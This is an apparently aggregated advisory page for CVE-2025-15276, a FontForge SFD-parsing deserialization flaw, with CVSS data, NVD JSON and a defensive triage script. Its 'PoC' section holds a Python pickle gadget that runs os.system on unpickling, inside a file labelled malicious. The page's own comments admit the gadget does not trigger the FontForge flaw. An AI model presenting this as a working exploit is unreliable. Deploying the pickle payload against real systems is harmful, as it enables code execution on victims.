Security Vulnerability Report
CVE-2025-15276 CVSS 7.8 HIGH

CVE-2025-15276

Published: 2025-12-31 07:15:52
Last Modified: 2026-01-07 16:03:03

Description

FontForge SFD File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28198.

Practitioner notes: NVD classifies the weakness as CWE-502 and scores the attack vector as Local (AV:L) despite the "remote attackers" wording above; the attacker delivers a file and the victim must open it in FontForge, and no network-exposed FontForge service is involved. SFD (Spline Font Database) is FontForge's native plain-text project format, so "deserialization" here means FontForge's own parser rebuilding font objects from the file's "Key: value" lines, not a language-level serialization framework. Any code the attacker runs gets the privileges of the user who opened the file. The advisory does not name the mishandled field, so the only reliable mitigation this page supports is to update to a fixed FontForge build and to treat SFD files from untrusted sources as executable content.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector: Local; Attack Complexity: Low; Privileges Required: None; User Interaction: Required; Scope: Unchanged; Confidentiality/Integrity/Availability impact: High (exploitability sub-score 1.8, impact sub-score 5.9)
Weakness
CWE-502 (Deserialization of Untrusted Data)

Configurations (Affected Products)

cpe:2.3:a:fontforge:fontforge:20251009:*:*:*:*:*:*:* - VULNERABLE
FontForge < latest fixed version (the fixed release is not named on this page; NVD lists only build 20251009 as affected, so treat other builds as unassessed rather than safe and consult the ZDI advisory)
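The two checks a responder actually needs from the description and the affected-product list above are (a) whether a file carries SFD content at all, judged by its magic header rather than its extension, since the flaw is only reached when someone opens such a file in FontForge, and (b) whether an installed FontForge build is the one NVD lists as affected. The script below is an added example written for this page; it is not FontForge code and not the ZDI proof of concept. It assumes SFD files begin with a "SplineFontDB: <version>" line followed by "Key: value" lines, that FontForge builds are YYYYMMDD date stamps, and it constructs its own sample files and a sample `fontforge -version` output whose exact layout is an assumption.

```python
"""Triage helpers for CVE-2025-15276 (FontForge SFD parsing RCE).

Added example for this page; not FontForge code and not ZDI's PoC.
Assumptions: SFD files start with "SplineFontDB: <version>" and continue
with "Key: value" lines; FontForge builds are YYYYMMDD stamps; the sample
`fontforge -version` output below is constructed and its layout assumed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# The only FontForge build NVD lists as affected on this page
# (cpe:2.3:a:fontforge:fontforge:20251009:*:*:*:*:*:*:*). Older builds are
# not assessed here; treat "not listed" as "check the ZDI advisory", not "safe".
AFFECTED_BUILDS = {"20251009"}

# SFD files open with this token on their first line ("SplineFontDB: <version>").
SFD_MAGIC = "SplineFontDB:"


@dataclass
class SfdHeader:
    sfd_version: str          # value of the SplineFontDB: line, e.g. "3.2"
    font_name: Optional[str]  # value of the FontName: line, if present


def is_sfd(data: bytes) -> bool:
    """True if the blob carries SFD content, judged by magic, not file name."""
    head = data[:64].decode("utf-8", errors="replace").lstrip("\ufeff \t\r\n")
    return head.startswith(SFD_MAGIC)


def parse_sfd_header(data: bytes) -> Optional[SfdHeader]:
    """Read the leading 'Key: value' lines of an SFD blob; None if not SFD.

    Only the first 4 KiB are inspected as text. Nothing is evaluated or
    handed to FontForge, so this is safe to run on untrusted input."""
    if not is_sfd(data):
        return None
    text = data[:4096].decode("utf-8", errors="replace").lstrip("\ufeff")
    sfd_version: Optional[str] = None
    font_name: Optional[str] = None
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "SplineFontDB" and sfd_version is None:
            sfd_version = value
        elif key == "FontName" and font_name is None:
            font_name = value
    return SfdHeader(sfd_version=sfd_version or "", font_name=font_name)


def triage_attachments(attachments: List[Tuple[str, bytes]]) -> List[Tuple[str, SfdHeader]]:
    """Return (name, header) for every attachment that is really SFD content,
    whatever extension it was given. The flaw needs the victim to open such a
    file in FontForge, so this is the gate to put on mail or upload paths."""
    hits = []
    for name, blob in attachments:
        hdr = parse_sfd_header(blob)
        if hdr is not None:
            hits.append((name, hdr))
    return hits


def build_from_version_output(output: str) -> Optional[str]:
    """Pull the YYYYMMDD build stamp out of `fontforge -version` output.

    FontForge versions are date stamps; the regex only relies on one 8-digit
    token starting with '20' being present, so the exact layout of the output
    (assumed in the sample below) does not matter."""
    m = re.search(r"\b(20\d{6})\b", output)
    return m.group(1) if m else None


def is_affected_build(build: Optional[str]) -> bool:
    """True only for builds NVD lists as affected for this CVE."""
    return build is not None and build in AFFECTED_BUILDS


# Constructed samples (not real captured files or program output).
SAMPLE_SFD = (
    b"SplineFontDB: 3.2\n"
    b"FontName: ExampleSans\n"
    b"FullName: Example Sans\n"
    b"Encoding: UnicodeBmp\n"
)
SAMPLE_PDF = b"%PDF-1.7\n% not a font\n"
SAMPLE_VERSION_OUTPUT = "fontforge 20251009\n build date: 2025-10-09\n"  # layout assumed

if __name__ == "__main__":
    for name, hdr in triage_attachments(
        [("font.sfd", SAMPLE_SFD), ("invoice.txt", SAMPLE_SFD), ("report.pdf", SAMPLE_PDF)]
    ):
        print(f"SFD content in {name}: format {hdr.sfd_version}, FontName {hdr.font_name}")
    build = build_from_version_output(SAMPLE_VERSION_OUTPUT)
    print(f"installed build {build}: {'AFFECTED' if is_affected_build(build) else 'not listed as affected'}")
```

The magic check matters more than the extension check: the advisory requires the victim to open the file, and a renamed SFD is still opened as SFD once the user points FontForge at it. The version check deliberately returns True only for the build NVD names, because this page gives no fix version; anything else should be resolved against the ZDI advisory rather than assumed clean.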

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-15276 FontForge SFD file deserialization RCE PoC
# This generator illustrates CWE-502 (deserialization of untrusted data) with a
# Python pickle payload embedded in an SFD-shaped text file. It does NOT
# reproduce the FontForge parser flaw: FontForge is C code and SFD is a
# plain-text "Key: value" format, so nothing in FontForge unpickles this data.
# The exact SFD field FontForge mishandles is not public on this page; the
# "BeginDeserialization" field below is hypothetical.
# Note: this is for educational and security research purposes only
import os
import pickle


class ExploitPayload:
    """Object whose __reduce__ runs a command when the pickle is loaded.

    This is the classic pickle gadget: pickle.loads() on this payload calls
    os.system("calc.exe") inside the loading process. It only fires in a
    Python process that unpickles the bytes."""

    def __reduce__(self):
        # In a real attack this would be replaced with a more sophisticated payload
        cmd = "calc.exe"  # simple demonstration command (Windows)
        return (os.system, (cmd,))


def create_malicious_sfd() -> bytes:
    """Generate an SFD-shaped file with the pickle payload embedded.

    Layout is illustrative: a real SFD header line, a FontName line, and a
    hypothetical field carrying the serialized blob."""
    payload = pickle.dumps(ExploitPayload())

    # SFD file structure (simplified representation)
    sfd_header = b"SplineFontDB: 3.0\n"
    sfd_fontname = b"FontName: MaliciousFont\n"
    # Hypothetical field carrying the serialized data; not part of the SFD format
    malicious_data = b"BeginDeserialization: " + payload + b"\nEndDeserialization\n"

    return sfd_header + sfd_fontname + malicious_data


def main():
    print("[*] CVE-2025-15276 FontForge SFD Deserialization RCE PoC")
    print("[*] Generating malicious SFD file...")
    malicious_sfd = create_malicious_sfd()
    output_file = "CVE-2025-15276_malicious.sfd"
    with open(output_file, "wb") as f:
        f.write(malicious_sfd)
    print(f"[+] Malicious SFD file created: {output_file}")
    print("[*] Attack vector per the advisory: the target must open an SFD file with FontForge")
    print("[*] Note: this file carries a Python pickle and does not by itself trigger the FontForge flaw")


if __name__ == "__main__":
    main()

References

https://www.zerodayinitiative.com/advisories/ZDI-25-1187/ (ZDI-25-1187, Third Party Advisory; the ZDI case was ZDI-CAN-28198)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-15276",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-31T07:15:51.870",
    "lastModified": "2026-01-07T16:03:03.063",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "FontForge SFD File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28198."
      },
      {
        "lang": "es",
        "value": "Vulnerabilidad de ejecución remota de código por deserialización de datos no confiables durante el análisis de archivos SFD de FontForge. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de FontForge. Se requiere interacción del usuario para explotar esta vulnerabilidad, ya que el objetivo debe visitar una página maliciosa o abrir un archivo malicioso.\n\nLa falla específica existe dentro del análisis de archivos SFD. El problema resulta de la falta de validación adecuada de los datos proporcionados por el usuario, lo que puede resultar en la deserialización de datos no confiables. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual. Fue ZDI-CAN-28198."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-502"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fontforge:fontforge:20251009:*:*:*:*:*:*:*",
                "matchCriteriaId": "1C318A12-82C3-4AD4-9BDF-A7B485A20A38"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1187/",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}